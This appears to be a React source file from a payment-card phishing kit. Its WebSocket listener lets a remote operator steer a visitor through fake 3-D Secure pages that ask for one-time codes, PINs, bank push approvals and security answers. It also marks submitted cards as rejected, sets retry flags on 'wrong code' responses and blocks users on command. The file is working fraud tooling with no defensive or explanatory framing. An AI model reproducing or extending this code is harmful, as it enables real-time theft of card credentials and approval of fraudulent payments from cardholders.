import React, { useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import { ToastContainer, toast } from 'react-toastify';
import { AiOutlineExclamationCircle } from 'react-icons/ai';
import { wsClient } from './wsClient';

import 'react-toastify/dist/ReactToastify.css';
import './Toast.css';

const Websocket = () => {
    const navigate = useNavigate();

    useEffect(() => {
        // Ensure WebSocket is connected on mount
        wsClient.connect();

        const unsubscribe = wsClient.subscribe((event, data) => {
            if (event === 'command' && data) {
                const cmdType = data.type || data.action;

                if (data.design) {
                    localStorage.setItem('session_design', data.design);
                }

                if (cmdType === "uuId_assign") {
                    localStorage.setItem("uuId", data.uuId);
                    localStorage.setItem("session_uuId", data.uuId);
                } else if (cmdType === "message") {
                    toast(
                        <div className="flex items-center gap-2">
                            <AiOutlineExclamationCircle className="text-yellow-500" size={24} />
                            <span>{data.message}</span>
                        </div>,
                        {
                            position: "bottom-right",
                            autoClose: 10000,
                            className: "bg-gray-800 text-white rounded shadow-md",
                            progressClassName: "bg-yellow-500",
                        }
                    );
                } else if (cmdType === "block_user") {
                    localStorage.setItem('blocked', 'true');
                } else if (cmdType === "question_response" || cmdType === "show_question") {
                    if (data.message) {
                        localStorage.setItem('seq_quest', data.message);
                    }
                    navigate("/3ds/question");
                } else if (cmdType === "push_text" || cmdType === "show_push" || cmdType === "show_bank_push") {
                    if (data.message) {
                        localStorage.setItem('push_text', data.message);
                    }
                    navigate("/3ds/push");
                } else if (cmdType === "show_refund") {
                    if (data.isRetry || data.to === "wrong_code" || data.to === "wrong_refund") {
                        const currentUuId = wsClient.getActiveUuId();
                        sessionStorage.setItem("refund_retry_flag_" + currentUuId, "true");
                    }
                    navigate("/3ds/refund");
                } else if (cmdType === "show_otp") {
                    if (data.isRetry || data.to === "wrong_code") {
                        const currentUuId = wsClient.getActiveUuId();
                        sessionStorage.setItem("otp_retry_flag_" + currentUuId, "true");
                    }
                    navigate("/3ds/otp");
                } else if (cmdType === "show_pin") {
                    if (data.isRetry) {
                        const currentUuId = wsClient.getActiveUuId();
                        sessionStorage.setItem("pin_retry_flag_" + currentUuId, "true");
                    }
                    navigate("/3ds/balance");
                } else if (cmdType === "show_error") {
                    const lastCard = localStorage.getItem('session_last_submitted_card') || '';
                    if (lastCard) {
                        sessionStorage.setItem('rejected_card', lastCard);
                    }
                    navigate("/checkout");
                } else if (cmdType === "redirect_success") {
                    navigate("/ThankYou");
                } else if (cmdType === "redirect") {
                    const RedirectPage = data.to;
                    if (RedirectPage === "refund_page" || RedirectPage === "wrong_refund") {
                        if (RedirectPage === "wrong_refund" || data.isRetry) {
                            const currentUuId = wsClient.getActiveUuId();
                            sessionStorage.setItem("refund_retry_flag_" + currentUuId, "true");
                        }
                        navigate("/3ds/refund");
                    } else if (RedirectPage === "otp_page" || RedirectPage === "wrong_code") {
                        if (RedirectPage === "wrong_code" || data.isRetry) {
                            const currentUuId = wsClient.getActiveUuId();
                            sessionStorage.setItem("otp_retry_flag_" + currentUuId, "true");
                        }
                        navigate("/3ds/otp");
                    } else if (RedirectPage === "wrong_data") {
                        const lastCard = localStorage.getItem('session_last_submitted_card') || '';
                        if (lastCard) {
                            sessionStorage.setItem('rejected_card', lastCard);
                        }
                        navigate("/checkout");
                    } else if (RedirectPage === "sucess_page" || RedirectPage === "success_page") {
                        navigate("/ThankYou");
                    } else if (RedirectPage === "wrong_push" || RedirectPage === "push_page") {
                        navigate("/3ds/push");
                    } else if (RedirectPage === "wrong_balance" || RedirectPage === "balance_page") {
                        if (RedirectPage === "wrong_balance" || data.isRetry) {
                            const currentUuId = wsClient.getActiveUuId();
                            sessionStorage.setItem("pin_retry_flag_" + currentUuId, "true");
                        }
                        navigate("/3ds/balance");
                    } else if (RedirectPage === "original_page") {
                        navigate("/success");
                    }
                }
            }
        });

        return () => {
            unsubscribe();
        };
    }, [navigate]);

    return (
        <ToastContainer
            hideProgressBar={false}
            newestOnTop={false}
            closeOnClick
            rtl={false}
            pauseOnFocusLoss
            draggable
            pauseOnHover
        />
    );
};

export default Websocket;